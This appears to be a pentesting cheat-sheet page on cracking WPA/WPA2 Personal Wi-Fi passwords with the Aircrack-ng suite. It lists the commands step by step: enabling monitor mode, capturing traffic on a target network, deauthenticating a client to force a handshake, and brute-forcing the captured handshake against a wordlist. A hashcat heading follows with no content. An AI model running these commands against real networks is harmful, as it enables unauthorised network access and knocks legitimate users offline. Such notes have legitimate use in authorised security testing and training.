WPA/WPA2 Personal
Setup
## Kill processes that may interfere with monitor mode
airmon-ng check kill
## Start Monitor Mode
airmon-ng start [network interface]Exploit (Aircrack-ng)
## Sniff packets on a specific BSSID and save to a file to analyze
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]
## Deauth a device on the network so we can capture the handshake when it tries to reconnect to the network
aireplay-ng --deauth 10 -a [target network bssid] -c [target device bssid] [interface]
## Use the captured handshake along with a wordlist to try to brute-force the password
aircrack-ng [airodump.cap file] -w [wordlist]Exploit (hashcat)
References
Last updated